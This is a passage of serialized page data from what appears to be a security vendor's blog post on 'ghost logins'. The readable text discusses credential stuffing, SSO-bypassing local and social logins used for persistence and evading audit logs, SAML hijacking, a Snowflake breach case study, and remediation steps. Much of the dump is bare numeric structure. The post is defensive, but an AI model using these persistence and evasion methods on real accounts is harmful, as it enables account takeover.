(",[],{},{"nodeType":186,"data":185080,"content":185081},{"uri":125812},[185082],{"nodeType":173,"value":1255,"marks":185083,"data":185085},[185084],{"type":194},{},{"nodeType":173,"value":53584,"marks":185087,"data":185088},[],{},{"nodeType":254,"data":185090,"content":185091},{},[185092],{"nodeType":178,"data":185093,"content":185094},{},[185095,185098,185105],{"nodeType":173,"value":174447,"marks":185096,"data":185097},[],{},{"nodeType":186,"data":185099,"content":185100},{"uri":125982},[185101],{"nodeType":173,"value":1300,"marks":185102,"data":185104},[185103],{"type":194},{},{"nodeType":173,"value":53584,"marks":185106,"data":185107},[],{},{"nodeType":254,"data":185109,"content":185110},{},[185111],{"nodeType":178,"data":185112,"content":185113},{},[185114,185117,185124],{"nodeType":173,"value":174385,"marks":185115,"data":185116},[],{},{"nodeType":186,"data":185118,"content":185119},{"uri":174390},[185120],{"nodeType":173,"value":174393,"marks":185121,"data":185123},[185122],{"type":194},{},{"nodeType":173,"value":53584,"marks":185125,"data":185126},[],{},{"nodeType":178,"data":185128,"content":185129},{},[185130],{"nodeType":173,"value":185131,"marks":185132,"data":185134},"So, it’s easier than ever for attackers to gather breached credentials and weaponize them at scale. ",[185133],{"type":370},{},{"nodeType":178,"data":185136,"content":185137},{},[185138],{"nodeType":173,"value":185139,"marks":185140,"data":185141},"Realistically, any username and password combination for addresses belonging to a specific organization/domain can be attempted on any app. Breached credential data will often provide a strong indicator of other apps also in use for that organization. And for apps with a custom tenant URL (that cannot be easily guessed) data dumps often helpfully include the URLs for those login pages, too.  ",[],{},{"nodeType":178,"data":185143,"content":185144},{},[185145],{"nodeType":173,"value":185146,"marks":185147,"data":185148},"The risk posed by the massive amounts of leaked credentials available is heightened because: ",[],{},{"nodeType":250,"data":185150,"content":185151},{},[185152,185173],{"nodeType":254,"data":185153,"content":185154},{},[185155],{"nodeType":178,"data":185156,"content":185157},{},[185158,185162,185169],{"nodeType":173,"value":185159,"marks":185160,"data":185161},"Many employees reuse passwords, with ",[],{},{"nodeType":186,"data":185163,"content":185164},{"uri":4492},[185165],{"nodeType":173,"value":185166,"marks":185167,"data":185168},"~9% of all accounts using a breached, weak, or reused password",[],{},{"nodeType":173,"value":185170,"marks":185171,"data":185172},". This isn’t just for low-risk apps either, and includes the reuse of highly sensitive IdP creds. ",[],{},{"nodeType":254,"data":185174,"content":185175},{},[185176],{"nodeType":178,"data":185177,"content":185178},{},[185179],{"nodeType":173,"value":185180,"marks":185181,"data":185182},"Organizations don’t typically rotate or enforce changes to SaaS app passwords in the same way they might for company account/device login connected to Active Directory.  ",[],{},{"nodeType":178,"data":185184,"content":185185},{},[185186],{"nodeType":173,"value":185187,"marks":185188,"data":185189},"Ghost logins aren’t limited to just username and password either. For example, a breached social account such as Facebook or Google can result in a broader compromise if those accounts have been connected to any corporate apps.   ",[],{},{"nodeType":178,"data":185191,"content":185192},{},[185193],{"nodeType":173,"value":185194,"marks":185195,"data":185197},"So, exploiting ghost logins can be a highly effective method for attackers to gain initial access to a user account from which to launch further attacks.  ",[185196],{"type":370},{},{"nodeType":235,"data":185199,"content":185200},{},[185201],{"nodeType":173,"value":185202,"marks":185203,"data":185204},"Ghost logins for persistence and defense evasion",[],{},{"nodeType":178,"data":185206,"content":185207},{},[185208],{"nodeType":173,"value":185209,"marks":185210,"data":185211},"Now, we’ll take a look at how attackers can leverage ghost logins as part of the later stages of an attack, having already established an initial foothold via account compromise. ",[],{},{"nodeType":178,"data":185213,"content":185214},{},[185215,185219],{"nodeType":173,"value":185216,"marks":185217,"data":185218},"If an organization has a reasonable level of security monitoring in-place (depending on log availability from the particular app vendor), or a victim receives a notification about an unusual login (e.g. from a new device or unusual IP) then access to an account can be short-lived. ",[],{},{"nodeType":173,"value":185220,"marks":185221,"data":185223},"However, ghost logins can provide attackers with the tools to maintain persistent access to a compromised account, even if the initial compromised login method is disabled or revoked. ",[185222],{"type":370},{},{"nodeType":178,"data":185225,"content":185226},{},[185227,185231,185236],{"nodeType":173,"value":185228,"marks":185229,"data":185230},"For example, if a social login is used to access an account, an adversary may be able to configure a separate username/password login, or even (though much less commonly) connect a second social account that the adversary controls. This allows the adversary to maintain persistent access to the user account ",[],{},{"nodeType":173,"value":185232,"marks":185233,"data":185235},"even in the event of password changes or MFA changes",[185234],{"type":370},{},{"nodeType":173,"value":185237,"marks":185238,"data":185239},". The attack will go unnoticed if the victim organization relies on SSO logs for auditing access to SaaS applications because the attack bypasses SSO, as the login remains local to the SaaS app or, in the case of an OIDC SSO login, the adversary’s own social account.",[],{},{"nodeType":178,"data":185241,"content":185242},{},[185243,185247,185254,185258,185266],{"nodeType":173,"value":185244,"marks":185245,"data":185246},"Another quirk is that it’s common for ordinary users to become app-level admins when an app is self-adopted by an individual or team. If an attacker is able to gain control of such an account, it can then be used to target other users without needing to deliver phishing links by hijacking SAML-based authentication. In this scenario, users attempting to sign in using SAML SSO are directed it to an attacker-controlled tenant in a watering hole attack (also known as ",[],{},{"nodeType":186,"data":185248,"content":185249},{"uri":63250},[185250],{"nodeType":173,"value":63256,"marks":185251,"data":185253},[185252],{"type":194},{},{"nodeType":173,"value":185255,"marks":185256,"data":185257},", which you can ",[],{},{"nodeType":186,"data":185259,"content":185260},{"uri":70029},[185261],{"nodeType":173,"value":185262,"marks":185263,"data":185265},"read more about in another blog post",[185264],{"type":194},{},{"nodeType":173,"value":60235,"marks":185267,"data":185268},[],{},{"nodeType":178,"data":185270,"content":185271},{},[185272,185276,185284],{"nodeType":173,"value":185273,"marks":185274,"data":185275},"If you're curious as to how an attacker might be able to compromise an IdP account such as Okta, ",[],{},{"nodeType":186,"data":185277,"content":185278},{"uri":49844},[185279],{"nodeType":173,"value":185280,"marks":185281,"data":185283},"you should check out our blog post on AitM and BitM phishing techniques",[185282],{"type":194},{},{"nodeType":173,"value":481,"marks":185285,"data":185286},[],{},{"nodeType":169,"data":185288,"content":185289},{},[185290],{"nodeType":173,"value":185291,"marks":185292,"data":185293},"Case study: Snowflake",[],{},{"nodeType":178,"data":185295,"content":185296},{},[185297,185300,185307],{"nodeType":173,"value":5039,"marks":185298,"data":185299},[],{},{"nodeType":186,"data":185301,"content":185302},{"uri":74621},[185303],{"nodeType":173,"value":185304,"marks":185305,"data":185306},"recent attacks on 165 Snowflake customers",[],{},{"nodeType":173,"value":185308,"marks":185309,"data":185310},", resulting in hundreds of millions of breached customer records, were the product of a credential stuffing campaign using stolen credentials from infostealer infections dating back to 2020. ",[],{},{"nodeType":178,"data":185312,"content":185313},{},[185314],{"nodeType":173,"value":185315,"marks":185316,"data":185317},"The industry response to Snowflake was typical: check whether Snowflake has been set up for SSO, and if so, job done — we’re protected by MFA.",[],{},{"nodeType":178,"data":185319,"content":185320},{},[185321],{"nodeType":173,"value":185322,"marks":185323,"data":185324},"The reality was that MFA was not — and could not — be centrally enforced for username and password accounts. Even if MFA was applied at the IdP level for SSO logins, it was not enforced for local username and password logins. It needed to be opted-into by the user. ",[],{},{"nodeType":178,"data":185326,"content":185327},{},[185328,185332,185339],{"nodeType":173,"value":185329,"marks":185330,"data":185331},"This meant the most logical thing to do was to disable local accounts. But because Snowflake is essentially a cloud-hosted SQL database, there was no easy-to-use GUI to access local account config data. Once you’d managed to get an admin account with the right permissions, you needed to run various commands to find and unset the accounts. ",[],{},{"nodeType":186,"data":185333,"content":185334},{"uri":184425},[185335],{"nodeType":173,"value":185336,"marks":185337,"data":185338},"But if you didn’t have the exact type of admin account, misleading results would be returned — and even after you had fixed the vulnerability it took hours to update the database. ",[],{},{"nodeType":173,"value":37,"marks":185340,"data":185341},[],{},{"nodeType":178,"data":185343,"content":185344},{},[185345],{"nodeType":173,"value":185346,"marks":185347,"data":185348},"This meant that organizations were exposed to these attacks for a prolonged period, and were left uncertain as to whether they had addressed the vulnerabilities or not. ",[],{},{"nodeType":169,"data":185350,"content":185351},{},[185352],{"nodeType":173,"value":185353,"marks":185354,"data":185355},"Using Push to find and fix ghost logins across your app inventory",[],{},{"nodeType":178,"data":185357,"content":185358},{},[185359],{"nodeType":173,"value":185360,"marks":185361,"data":185362},"Finding and fixing ghost logins is a challenge for most organizations. Since you can’t rely on the view provided by your IdP, you need to:",[],{},{"nodeType":250,"data":185364,"content":185365},{},[185366,185376,185386],{"nodeType":254,"data":185367,"content":185368},{},[185369],{"nodeType":178,"data":185370,"content":185371},{},[185372],{"nodeType":173,"value":185373,"marks":185374,"data":185375},"Discover the apps in use across your organization",[],{},{"nodeType":254,"data":185377,"content":185378},{},[185379],{"nodeType":178,"data":185380,"content":185381},{},[185382],{"nodeType":173,"value":185383,"marks":185384,"data":185385},"Get admin rights, audit each app, and unset any local credentials (enforcing MFA at the app-level too if you can, for good measure)",[],{},{"nodeType":254,"data":185387,"content":185388},{},[185389],{"nodeType":178,"data":185390,"content":185391},{},[185392],{"nodeType":173,"value":185393,"marks":185394,"data":185395},"Configure the app to prevent local accounts being created (again, if possible)",[],{},{"nodeType":178,"data":185397,"content":185398},{},[185399],{"nodeType":173,"value":185400,"marks":185401,"data":185402},"Not only is this a sisyphean task with continually moving goalposts, but depending on which apps you use, and how they’ve been designed, it may not be possible to remediate every instance of ghost logins. For that reason, it’s important to also invest in your identity threat detection and response capabilities — for when, not if, an account takeover attempt occurs. ",[],{},{"nodeType":178,"data":185404,"content":185405},{},[185406,185410,185418],{"nodeType":173,"value":185407,"marks":185408,"data":185409},"Push helps organizations to defend against ghost logins and other identity threats with a defense-in-depth approach: Using a browser-based agent to generate visibility of all logins (not just via IdP logs) while also detecting, intercepting, and shutting down account takeover attempts via phishing, credential stuffing, and session hijacking. ",[],{},{"nodeType":186,"data":185411,"content":185412},{"uri":97117},[185413],{"nodeType":173,"value":185414,"marks":185415,"data":185417},"Learn more here.",[185416],{"type":194},{},{"nodeType":173,"value":37,"marks":185419,"data":185420},[],{},{"nodeType":178,"data":185422,"content":185423},{},[185424,185428,185435],{"nodeType":173,"value":185425,"marks":185426,"data":185427},"And if you'd like to learn more about ghost logins and other identity attack techniques, ",[],{},{"nodeType":186,"data":185429,"content":185430},{"uri":106719},[185431],{"nodeType":173,"value":185432,"marks":185433,"data":185434},"check out the SaaS attack matrix on GitHub",[],{},{"nodeType":173,"value":2340,"marks":185436,"data":185437},[],{},{"nodeType":312,"data":185439,"content":185443},{"target":185440},{"sys":185441},{"id":185442,"type":317,"linkType":318},"1VMpMgZvx9hgps2OoxCTmF",[],{"nodeType":178,"data":185445,"content":185446},{},[185447],{"nodeType":173,"value":37,"marks":185448,"data":185449},[],{},"How ghost logins can be used by cyber attackers for account takeover and persistence.","2024-07-10T00:00:00.000Z",{"items":185453},[185454,185456],{"sys":185455,"name":505},{"id":504},{"sys":185457,"name":509},{"id":508},{"items":185459},[185460],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":185461},{"url":1496},{"__typename":1528,"sys":185463,"content":185464,"title":496,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":185738,"authorsCollection":185744},{"id":162},{"json":185465},{"nodeType":165,"data":185466,"content":185467},{},[185468,185474,185490,185503,185509,185515,185518,185524,185530,185578,185584,185589,185592,185598,185604,185610,185616,185622,185636,185641,185647,185653,185667,185672,185678,185684,185690,185696,185702,185705,185711,185727,185732],{"nodeType":169,"data":185469,"content":185470},{},[185471],{"nodeType":173,"value":174,"marks":185472,"data":185473},[],{},{"nodeType":178,"data":185475,"content":185476},{},[185477,185480,185487],{"nodeType":173,"value":182,"marks":185478,"data":185479},[],{},{"nodeType":186,"data":185481,"content":185482},{"uri":188},[185483],{"nodeType":173,"value":191,"marks":185484,"data":185486},[185485],{"type":194},{},{"nodeType":173,"value":197,"marks":185488,"data":185489},[],{},{"nodeType":178,"data":185491,"content":185492},{},[185493,185496,185500],{"nodeType":173,"value":204,"marks":185494,"data":185495},[],{},{"nodeType":173,"value":208,"marks":185497,"data":185499},[185498],{"type":194},{},{"nodeType":173,"value":213,"marks":185501,"data":185502},[],{},{"nodeType":178,"data":185504,"content":185505},{},[185506],{"nodeType":173,"value":220,"marks":185507,"data":185508},[],{},{"nodeType":178,"data":185510,"content":185511},{},[185512],{"nodeType":173,"value":227,"marks":185513,"data":185514},[],{},{"nodeType":231,"data":185516,"content":185517},{},[],{"nodeType":235,"data":185519,"content":185520},{},[185521],{"nodeType":173,"value":239,"marks":185522,"data":185523},[],{},{"nodeType":178,"data":185525,"content":185526},{},[185527],{"nodeType":173,"value":246,"marks":185528,"data":185529},[],{},{"nodeType":250,"data":185531,"content":185532},{},[185533,185542,185551,185560,185569],{"nodeType":254,"data":185534,"content":185535},{},[185536],{"nodeType":178,"data":185537,"content":185538},{},[185539],{"nodeType":173,"value":261,"marks":185540,"data":185541},[],{},{"nodeType":254,"data":185543,"content":185544},{},[185545],{"nodeType":178,"data":185546,"content":185547},{},[185548],{"nodeType":173,"value":271,"marks":185549,"data":185550},[],{},{"nodeType":254,"data":185552,"content":185553},{},[185554],{"nodeType":178,"data":185555,"content":185556},{},[185557],{"nodeType":173,"value":281,"marks":185558,"data":185559},[],{},{"nodeType":254,"data":185561,"content":185562},{},[185563],{"nodeType":178,"data":185564,"content":185565},{},[185566],{"nodeType":173,"value":291,"marks":185567,"data":185568},[],{},{"nodeType":254,"data":185570,"content":185571},{},[185572],{"nodeType":178,"data":185573,"content":185574},{},[185575],{"nodeType":173,"value":301,"marks":185576,"data":185577},[],{},{"nodeType":178,"data":185579,"content":185580},{},[185581],{"nodeType":173,"value":308,"marks":185582,"data":185583},[],{},{"nodeType":312,"data":185585,"content":185588},{"target":185586},{"sys":185587},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":185590,"content":185591},{},[],{"nodeType":235,"data":185593,"content":185594},{},[185595],{"nodeType":173,"value":327,"marks":185596,"data":185597},[],{},{"nodeType":178,"data":185599,"content":185600},{},[185601],{"nodeType":173,"value":334,"marks":185602,"data":185603},[],{},{"nodeType":178,"data":185605,"content":185606},{},[185607],{"nodeType":173,"value":341,"marks":185608,"data":185609},[],{},{"nodeType":178,"data":185611,"content":185612},{},[185613],{"nodeType":173,"value":348,"marks":185614,"data":185615},[],{},{"nodeType":178,"data":185617,"content":185618},{},[185619],{"nodeType":173,"value":355,"marks":185620,"data":185621},[],{},{"nodeType":235,"data":185623,"content":185624},{},[185625,185628,185633],{"nodeType":173,"value":362,"marks":185626,"data":185627},[],{},{"nodeType":173,"value":366,"marks":185629,"data":185632},[185630,185631],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":185634,"data":185635},[],{},{"nodeType":312,"data":185637,"content":185640},{"target":185638},{"sys":185639},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":185642,"content":185643},{},[185644],{"nodeType":173,"value":386,"marks":185645,"data":185646},[],{},{"nodeType":178,"data":185648,"content":185649},{},[185650],{"nodeType":173,"value":393,"marks":185651,"data":185652},[],{},{"nodeType":235,"data":185654,"content":185655},{},[185656,185659,185664],{"nodeType":173,"value":400,"marks":185657,"data":185658},[],{},{"nodeType":173,"value":404,"marks":185660,"data":185663},[185661,185662],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":185665,"data":185666},[],{},{"nodeType":312,"data":185668,"content":185671},{"target":185669},{"sys":185670},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":185673,"content":185674},{},[185675],{"nodeType":173,"value":423,"marks":185676,"data":185677},[],{},{"nodeType":178,"data":185679,"content":185680},{},[185681],{"nodeType":173,"value":430,"marks":185682,"data":185683},[],{},{"nodeType":178,"data":185685,"content":185686},{},[185687],{"nodeType":173,"value":437,"marks":185688,"data":185689},[],{},{"nodeType":178,"data":185691,"content":185692},{},[185693],{"nodeType":173,"value":444,"marks":185694,"data":185695},[],{},{"nodeType":178,"data":185697,"content":185698},{},[185699],{"nodeType":173,"value":451,"marks":185700,"data":185701},[],{},{"nodeType":231,"data":185703,"content":185704},{},[],{"nodeType":169,"data":185706,"content":185707},{},[185708],{"nodeType":173,"value":461,"marks":185709,"data":185710},[],{},{"nodeType":178,"data":185712,"content":185713},{},[185714,185717,185724],{"nodeType":173,"value":468,"marks":185715,"data":185716},[],{},{"nodeType":186,"data":185718,"content":185719},{"uri":473},[185720],{"nodeType":173,"value":476,"marks":185721,"data":185723},[185722],{"type":194},{},{"nodeType":173,"value":481,"marks":185725,"data":185726},[],{},{"nodeType":312,"data":185728,"content":185731},{"target":185729},{"sys":185730},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":185733,"content":185734},{},[185735],{"nodeType":173,"value":37,"marks":185736,"data":185737},[],{},{"items":185739},[185740,185742],{"sys":185741,"name":505},{"id":504},{"sys":185743,"name":509},{"id":508},{"items":185745},[185746],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":185747},{"url":516},{"items":185749},[185750],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":185751},{"url":1496},{"json":185753,"links":186525},{"nodeType":165,"data":185754,"content":185755},{},[185756,185762,185768,185793,185799,185802,185808,185815,185831,185837,185843,185848,185854,185860,185881,185887,185893,185928,185934,185937,185943,185973,185978,185984,185990,185993,186000,186006,186036,186041,186047,186050,186057,186073,186079,186085,186101,186104,186111,186127,186133,186146,186159,186162,186169,186185,186191,186197,186281,186287,186292,186298,186304,186334,186340,186343,186350,186356,186362,186388,186394,186400,186403,186410,186426,186432,186438,186477,186482,186488,186503,186508,186514,186519],{"nodeType":178,"data":185757,"content":185758},{},[185759],{"nodeType":173,"value":179279,"marks":185760,"data":185761},[],{},{"nodeType":178,"data":185763,"content":185764},{},[185765],{"nodeType":173,"value":179286,"marks":185766,"data":185767},[],{},{"nodeType":178,"data":185769,"content":185770},{},[185771,185774,185780,185783,185790],{"nodeType":173,"value":179293,"marks":185772,"data":185773},[],{},{"nodeType":186,"data":185775,"content":185776},{"uri":61697},[185777],{"nodeType":173,"value":74174,"marks":185778,"data":185779},[],{},{"nodeType":173,"value":179303,"marks":185781,"data":185782},[],{},{"nodeType":186,"data":185784,"content":185785},{"uri":4342},[185786],{"nodeType":173,"value":835,"marks":185787,"data":185789},[185788],{"type":194},{},{"nodeType":173,"value":179314,"marks":185791,"data":185792},[],{},{"nodeType":178,"data":185794,"content":185795},{},[185796],{"nodeType":173,"value":179321,"marks":185797,"data":185798},[],{},{"nodeType":231,"data":185800,"content":185801},{},[],{"nodeType":169,"data":185803,"content":185804},{},[185805],{"nodeType":173,"value":179331,"marks":185806,"data":185807},[],{},{"nodeType":235,"data":185809,"content":185810},{},[185811],{"nodeType":173,"value":179338,"marks":185812,"data":185814},[185813],{"type":370},{},{"nodeType":178,"data":185816,"content":185817},{},[185818,185821,185828],{"nodeType":173,"value":179346,"marks":185819,"data":185820},[],{},{"nodeType":186,"data":185822,"content":185823},{"uri":179351},[185824],{"nodeType":173,"value":179354,"marks":185825,"data":185827},[185826],{"type":194},{},{"nodeType":173,"value":179359,"marks":185829,"data":185830},[],{},{"nodeType":178,"data":185832,"content":185833},{},[185834],{"nodeType":173,"value":179366,"marks":185835,"data":185836},[],{},{"nodeType":178,"data":185838,"content":185839},{},[185840],{"nodeType":173,"value":179373,"marks":185841,"data":185842},[],{},{"nodeType":312,"data":185844,"content":185847},{"target":185845},{"sys":185846},{"id":179380,"type":317,"linkType":318},[],{"nodeType":178,"data":185849,"content":185850},{},[185851],{"nodeType":173,"value":179386,"marks":185852,"data":185853},[],{},{"nodeType":178,"data":185855,"content":185856},{},[185857],{"nodeType":173,"value":179393,"marks":185858,"data":185859},[],{},{"nodeType":250,"data":185861,"content":185862},{},[185863,185872],{"nodeType":254,"data":185864,"content":185865},{},[185866],{"nodeType":178,"data":185867,"content":185868},{},[185869],{"nodeType":173,"value":179406,"marks":185870,"data":185871},[],{},{"nodeType":254,"data":185873,"content":185874},{},[185875],{"nodeType":178,"data":185876,"content":185877},{},[185878],{"nodeType":173,"value":179416,"marks":185879,"data":185880},[],{},{"nodeType":178,"data":185882,"content":185883},{},[185884],{"nodeType":173,"value":179423,"marks":185885,"data":185886},[],{},{"nodeType":178,"data":185888,"content":185889},{},[185890],{"nodeType":173,"value":179430,"marks":185891,"data":185892},[],{},{"nodeType":250,"data":185894,"content":185895},{},[185896,185912],{"nodeType":254,"data":185897,"content":185898},{},[185899],{"nodeType":178,"data":185900,"content":185901},{},[185902,185905,185909],{"nodeType":173,"value":179443,"marks":185903,"data":185904},[],{},{"nodeType":173,"value":179447,"marks":185906,"data":185908},[185907],{"type":194},{},{"nodeType":173,"value":179452,"marks":185910,"data":185911},[],{},{"nodeType":254,"data":185913,"content":185914},{},[185915],{"nodeType":178,"data":185916,"content":185917},{},[185918,185921,185925],{"nodeType":173,"value":15816,"marks":185919,"data":185920},[],{},{"nodeType":173,"value":179465,"marks":185922,"data":185924},[185923],{"type":194},{},{"nodeType":173,"value":179470,"marks":185926,"data":185927},[],{},{"nodeType":178,"data":185929,"content":185930},{},[185931],{"nodeType":173,"value":179477,"marks":185932,"data":185933},[],{},{"nodeType":231,"data":185935,"content":185936},{},[],{"nodeType":235,"data":185938,"content":185939},{},[185940],{"nodeType":173,"value":179487,"marks":185941,"data":185942},[],{},{"nodeType":178,"data":185944,"content":185945},{},[185946,185949,185956,185959,185963,185966,185970],{"nodeType":173,"value":179494,"marks":185947,"data":185948},[],{},{"nodeType":186,"data":185950,"content":185951},{"uri":179499},[185952],{"nodeType":173,"value":179502,"marks":185953,"data":185955},[185954],{"type":194},{},{"nodeType":173,"value":179507,"marks":185957,"data":185958},[],{},{"nodeType":173,"value":179511,"marks":185960,"data":185962},[185961],{"type":370},{},{"nodeType":173,"value":3107,"marks":185964,"data":185965},[],{},{"nodeType":173,"value":179519,"marks":185967,"data":185969},[185968],{"type":370},{},{"nodeType":173,"value":197,"marks":185971,"data":185972},[],{},{"nodeType":312,"data":185974,"content":185977},{"target":185975},{"sys":185976},{"id":179530,"type":317,"linkType":318},[],{"nodeType":178,"data":185979,"content":185980},{},[185981],{"nodeType":173,"value":179536,"marks":185982,"data":185983},[],{},{"nodeType":178,"data":185985,"content":185986},{},[185987],{"nodeType":173,"value":179543,"marks":185988,"data":185989},[],{},{"nodeType":231,"data":185991,"content":185992},{},[],{"nodeType":169,"data":185994,"content":185995},{},[185996],{"nodeType":173,"value":179553,"marks":185997,"data":185999},[185998],{"type":370},{},{"nodeType":178,"data":186001,"content":186002},{},[186003],{"nodeType":173,"value":179561,"marks":186004,"data":186005},[],{},{"nodeType":250,"data":186007,"content":186008},{},[186009,186018,186027],{"nodeType":254,"data":186010,"content":186011},{},[186012],{"nodeType":178,"data":186013,"content":186014},{},[186015],{"nodeType":173,"value":179574,"marks":186016,"data":186017},[],{},{"nodeType":254,"data":186019,"content":186020},{},[186021],{"nodeType":178,"data":186022,"content":186023},{},[186024],{"nodeType":173,"value":179584,"marks":186025,"data":186026},[],{},{"nodeType":254,"data":186028,"content":186029},{},[186030],{"nodeType":178,"data":186031,"content":186032},{},[186033],{"nodeType":173,"value":179594,"marks":186034,"data":186035},[],{},{"nodeType":312,"data":186037,"content":186040},{"target":186038},{"sys":186039},{"id":179601,"type":317,"linkType":318},[],{"nodeType":178,"data":186042,"content":186043},{},[186044],{"nodeType":173,"value":179607,"marks":186045,"data":186046},[],{},{"nodeType":231,"data":186048,"content":186049},{},[],{"nodeType":235,"data":186051,"content":186052},{},[186053],{"nodeType":173,"value":179617,"marks":186054,"data":186056},[186055],{"type":370},{},{"nodeType":178,"data":186058,"content":186059},{},[186060,186063,186070],{"nodeType":173,"value":179625,"marks":186061,"data":186062},[],{},{"nodeType":186,"data":186064,"content":186065},{"uri":179630},[186066],{"nodeType":173,"value":179633,"marks":186067,"data":186069},[186068],{"type":194},{},{"nodeType":173,"value":179638,"marks":186071,"data":186072},[],{},{"nodeType":178,"data":186074,"content":186075},{},[186076],{"nodeType":173,"value":179645,"marks":186077,"data":186078},[],{},{"nodeType":178,"data":186080,"content":186081},{},[186082],{"nodeType":173,"value":179652,"marks":186083,"data":186084},[],{},{"nodeType":178,"data":186086,"content":186087},{},[186088,186091,186098],{"nodeType":173,"value":179659,"marks":186089,"data":186090},[],{},{"nodeType":186,"data":186092,"content":186093},{"uri":106815},[186094],{"nodeType":173,"value":179666,"marks":186095,"data":186097},[186096],{"type":194},{},{"nodeType":173,"value":10557,"marks":186099,"data":186100},[],{},{"nodeType":231,"data":186102,"content":186103},{},[],{"nodeType":235,"data":186105,"content":186106},{},[186107],{"nodeType":173,"value":179680,"marks":186108,"data":186110},[186109],{"type":370},{},{"nodeType":178,"data":186112,"content":186113},{},[186114,186117,186124],{"nodeType":173,"value":179688,"marks":186115,"data":186116},[],{},{"nodeType":186,"data":186118,"content":186119},{"uri":179693},[186120],{"nodeType":173,"value":179696,"marks":186121,"data":186123},[186122],{"type":194},{},{"nodeType":173,"value":179701,"marks":186125,"data":186126},[],{},{"nodeType":178,"data":186128,"content":186129},{},[186130],{"nodeType":173,"value":179708,"marks":186131,"data":186132},[],{},{"nodeType":178,"data":186134,"content":186135},{},[186136,186139,186143],{"nodeType":173,"value":179715,"marks":186137,"data":186138},[],{},{"nodeType":173,"value":179719,"marks":186140,"data":186142},[186141],{"type":370},{},{"nodeType":173,"value":179724,"marks":186144,"data":186145},[],{},{"nodeType":3769,"data":186147,"content":186148},{},[186149],{"nodeType":178,"data":186150,"content":186151},{},[186152,186156],{"nodeType":173,"value":179734,"marks":186153,"data":186155},[186154],{"type":370},{},{"nodeType":173,"value":179739,"marks":186157,"data":186158},[],{},{"nodeType":231,"data":186160,"content":186161},{},[],{"nodeType":235,"data":186163,"content":186164},{},[186165],{"nodeType":173,"value":179749,"marks":186166,"data":186168},[186167],{"type":370},{},{"nodeType":178,"data":186170,"content":186171},{},[186172,186175,186182],{"nodeType":173,"value":179757,"marks":186173,"data":186174},[],{},{"nodeType":186,"data":186176,"content":186177},{"uri":155679},[186178],{"nodeType":173,"value":179764,"marks":186179,"data":186181},[186180],{"type":194},{},{"nodeType":173,"value":179769,"marks":186183,"data":186184},[],{},{"nodeType":178,"data":186186,"content":186187},{},[186188],{"nodeType":173,"value":179776,"marks":186189,"data":186190},[],{},{"nodeType":178,"data":186192,"content":186193},{},[186194],{"nodeType":173,"value":179783,"marks":186195,"data":186196},[],{},{"nodeType":250,"data":186198,"content":186199},{},[186200,186209,186218,186227,186236,186245,186254,186263,186272],{"nodeType":254,"data":186201,"content":186202},{},[186203],{"nodeType":178,"data":186204,"content":186205},{},[186206],{"nodeType":173,"value":179796,"marks":186207,"data":186208},[],{},{"nodeType":254,"data":186210,"content":186211},{},[186212],{"nodeType":178,"data":186213,"content":186214},{},[186215],{"nodeType":173,"value":179806,"marks":186216,"data":186217},[],{},{"nodeType":254,"data":186219,"content":186220},{},[186221],{"nodeType":178,"data":186222,"content":186223},{},[186224],{"nodeType":173,"value":179816,"marks":186225,"data":186226},[],{},{"nodeType":254,"data":186228,"content":186229},{},[186230],{"nodeType":178,"data":186231,"content":186232},{},[186233],{"nodeType":173,"value":179826,"marks":186234,"data":186235},[],{},{"nodeType":254,"data":186237,"content":186238},{},[186239],{"nodeType":178,"data":186240,"content":186241},{},[186242],{"nodeType":173,"value":179836,"marks":186243,"data":186244},[],{},{"nodeType":254,"data":186246,"content":186247},{},[186248],{"nodeType":178,"data":186249,"content":186250},{},[186251],{"nodeType":173,"value":179846,"marks":186252,"data":186253},[],{},{"nodeType":254,"data":186255,"content":186256},{},[186257],{"nodeType":178,"data":186258,"content":186259},{},[186260],{"nodeType":173,"value":179856,"marks":186261,"data":186262},[],{},{"nodeType":254,"data":186264,"content":186265},{},[186266],{"nodeType":178,"data":186267,"content":186268},{},[186269],{"nodeType":173,"value":179866,"marks":186270,"data":186271},[],{},{"nodeType":254,"data":186273,"content":186274},{},[186275],{"nodeType":178,"data":186276,"content":186277},{},[186278],{"nodeType":173,"value":179876,"marks":186279,"data":186280},[],{},{"nodeType":178,"data":186282,"content":186283},{},[186284],{"nodeType":173,"value":179883,"marks":186285,"data":186286},[],{},{"nodeType":312,"data":186288,"content":186291},{"target":186289},{"sys":186290},{"id":125630,"type":317,"linkType":318},[],{"nodeType":178,"data":186293,"content":186294},{},[186295],{"nodeType":173,"value":179895,"marks":186296,"data":186297},[],{},{"nodeType":178,"data":186299,"content":186300},{},[186301],{"nodeType":173,"value":179902,"marks":186302,"data":186303},[],{},{"nodeType":250,"data":186305,"content":186306},{},[186307,186316,186325],{"nodeType":254,"data":186308,"content":186309},{},[186310],{"nodeType":178,"data":186311,"content":186312},{},[186313],{"nodeType":173,"value":179915,"marks":186314,"data":186315},[],{},{"nodeType":254,"data":186317,"content":186318},{},[186319],{"nodeType":178,"data":186320,"content":186321},{},[186322],{"nodeType":173,"value":179925,"marks":186323,"data":186324},[],{},{"nodeType":254,"data":186326,"content":186327},{},[186328],{"nodeType":178,"data":186329,"content":186330},{},[186331],{"nodeType":173,"value":179935,"marks":186332,"data":186333},[],{},{"nodeType":178,"data":186335,"content":186336},{},[186337],{"nodeType":173,"value":179942,"marks":186338,"data":186339},[],{},{"nodeType":231,"data":186341,"content":186342},{},[],{"nodeType":235,"data":186344,"content":186345},{},[186346],{"nodeType":173,"value":179952,"marks":186347,"data":186349},[186348],{"type":370},{},{"nodeType":178,"data":186351,"content":186352},{},[186353],{"nodeType":173,"value":179960,"marks":186354,"data":186355},[],{},{"nodeType":178,"data":186357,"content":186358},{},[186359],{"nodeType":173,"value":179967,"marks":186360,"data":186361},[],{},{"nodeType":178,"data":186363,"content":186364},{},[186365,186368,186375,186378,186385],{"nodeType":173,"value":179974,"marks":186366,"data":186367},[],{},{"nodeType":186,"data":186369,"content":186370},{"uri":179979},[186371],{"nodeType":173,"value":179982,"marks":186372,"data":186374},[186373],{"type":194},{},{"nodeType":173,"v